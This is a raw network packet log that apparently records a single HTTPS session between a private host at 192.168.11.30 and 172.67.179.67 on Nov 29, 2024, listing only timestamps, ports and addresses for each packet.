                                                                                                            Nov 29, 2024 09:11:31.310992956 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.311198950 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.311759949 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.311933041 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.312033892 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.313011885 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.313179970 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.313268900 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.313497066 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.314115047 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.314487934 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.314960003 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.315135956 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.315753937 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.315996885 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.316029072 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.316150904 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.316955090 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.317457914 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.317703009 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.317878962 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.317935944 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.318850040 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.319082022 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.319238901 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.319382906 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.319479942 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.319617987 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.319843054 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.320575953 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.320758104 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.320758104 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.321403027 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.321641922 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.321681976 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.321688890 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.321873903 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.322540045 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.322789907 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.323268890 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.323477983 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.323477983 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.324031115 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.324249029 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.324254990 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.324455976 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.325078964 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.325336933 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.326132059 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.326375961 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.328907967 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.328916073 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.329303980 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.329313040 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.329536915 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.329536915 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.331783056 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.331792116 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.331957102 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.331957102 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.332001925 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.332001925 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.332009077 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.332151890 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.332201004 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.334470987 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.334480047 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.334779978 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.335139990 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.335150957 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.335406065 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.337205887 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.337214947 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.337357998 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.337357998 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.337405920 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.337418079 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.337455034 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.337503910 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.337603092 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.340627909 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.340641022 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.340837002 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.340843916 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.340884924 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.340982914 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.343190908 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.343203068 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.343485117 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.343492031 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.343682051 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.363562107 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.363574982 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.363795996 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.363804102 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.363893986 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.363995075 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.470673084 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.470686913 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.470854998 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.470854998 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.470902920 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.470907927 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.471000910 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.471050024 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.473289013 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.473300934 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.473583937 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.473592997 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.473830938 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.475951910 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.475963116 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.476159096 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.476159096 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.476166964 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.476208925 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.476208925 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.476398945 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.483460903 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.483473063 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.483597040 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.483697891 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.483699083 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.483707905 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.483793020 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.483807087 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.483820915 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.483891010 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.483952045 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.484040976 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.484086990 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.484138966 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.484138966 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.486289024 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.486300945 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.486550093 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.486550093 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.486557961 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.489229918 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.489243031 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.489594936 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.489594936 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.489603043 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.492022038 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.492034912 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.492300034 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.492306948 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.492660046 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.494750977 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.494762897 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.494930983 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.495029926 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.495034933 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.497490883 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.497503996 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.497634888 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.497639894 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.497703075 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.497703075 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.497800112 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.500490904 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.500502110 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.500675917 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.500675917 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.500675917 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.500675917 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.500688076 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.500727892 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.500776052 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.503142118 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.503154993 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.503418922 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.503424883 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.503514051 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.506087065 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.506098032 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.506233931 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.506241083 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.506295919 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.506295919 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.506344080 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.509334087 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.509346962 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.509524107 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.509531975 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.509598970 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.511925936 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.511935949 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.512092113 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.512099028 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.512142897 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.512142897 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.512192965 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.512240887 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.514482021 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.514493942 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.514633894 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.514633894 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.514682055 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.514775991 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.514781952 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.517343044 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.517357111 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.517487049 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.517487049 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.517496109 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.517534971 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.517534971 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.517585993 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.517692089 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.520661116 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.520672083 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.520792007 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.520792007 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.520884037 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.520941019 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.520946980 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.521821022 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.522048950 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.522056103 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.522882938 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.693207979 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.693218946 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.694204092 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.694211006 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.695343971 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.696029902 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.696038008 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.697062016 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.697062016 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.697067976 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.698190928 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.698812962 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.698822021 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.700100899 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.700112104 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.701237917 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.701452017 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.701462030 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.702761889 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.702766895 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.703903913 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.704858065 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.704873085 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.706006050 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.706010103 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.707145929 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.707510948 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.707526922 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.708477020 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.708482027 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.709039927 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.709234953 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.710035086 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.710048914 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.711132050 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.711134911 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.712271929 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.712999105 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.713009119 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.713987112 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.713992119 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.714939117 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.716336966 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.716346979 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.717232943 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.717236996 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.717613935 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.718828917 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.718838930 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.719008923 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.719008923 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.719017029 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.719055891 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.719101906 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.719203949 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.721661091 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.721669912 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.721879959 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.721884966 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.721977949 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.722031116 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.724970102 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.724984884 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.725110054 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.725110054 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.725155115 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.725157976 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.725207090 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.725253105 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.725305080 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.727669001 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.727679014 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.727807045 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.727807045 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.727854967 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.727858067 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.727906942 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.727957964 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.728054047 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.729352951 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.729413033 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.729492903 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.729492903 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.729537964 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.729541063 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.729588985 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.781464100 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.927735090 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.927755117 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.927881002 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.928037882 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.928045988 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.928244114 CET49766443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:11:31.937473059 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.937494993 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.937741995 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.937947989 CET44349766172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:11:31.937979937 CET44349766172.67.179.67192.168.11.30
